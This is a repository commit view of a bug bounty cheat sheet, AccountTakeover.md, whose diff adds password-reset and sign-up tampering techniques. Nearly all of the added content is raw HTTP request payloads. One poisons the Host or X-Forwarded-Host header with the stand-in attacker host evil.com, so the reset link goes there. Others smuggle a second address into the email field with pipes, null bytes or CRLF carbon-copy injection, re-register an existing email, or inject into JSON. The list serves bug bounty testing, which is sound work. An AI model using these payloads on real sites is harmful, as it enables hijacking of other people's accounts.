ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2025-01-30 14:55:05 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Account Takover [3]

Browse Source 
Add 3 tips
This commit is contained in:
Muhammad Daffa 2020-09-03 21:23:45 +07:00 committed by GitHub
parent 35198d15d7
commit 9cdc265377
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 40 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

41
AccountTakeover.md
View File

@ -21,6 +21,13 @@ Host: evil.com
[...] [...]
email=victim@mail.com email=victim@mail.com
``` ```
```
POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[...]
email=victim@mail.com
```
And the victim will receive the reset link with evil.com And the victim will receive the reset link with evil.com
4. Using separator in value of the parameter 4. Using separator in value of the parameter
@ -39,6 +46,11 @@ POST /reset
[...] [...]
email=victim@mail.com|hacker@mail.com email=victim@mail.com|hacker@mail.com
``` ```
```
POST /reset
[...]
email=victim@mail.com%00hacker@mail.com
```
5. No domain in value of the paramter 5. No domain in value of the paramter
``` ```
@ -47,9 +59,36 @@ POST /reset
email=victim email=victim
``` ```
6. No TLD in value of the paramter 6. No TLD in value of the parameter
``` ```
POST /reset POST /reset
[...] [...]
email=victim@mail email=victim@mail
``` ```
7. Using carbon copy
```
POST /reset
[...]
email=victim@mail.com%0a%0dcc:hacker@mail.com
```
8. Try re-sign up using same email
```
POST /newaccount
[...]
email=victim@mail.com&password=1234
```
After sign up using victim email, try signup again but using different password
```
POST /newaccount
[...]
email=victim@mail.com&password=hacked
```
9. If there is JSON data in body requests, add comma
```
POST /newaccount
[...]
{“email”:“victim@mail.com”,”hacker@mail.com”,“token”:”xxxxxxxxxx”}
```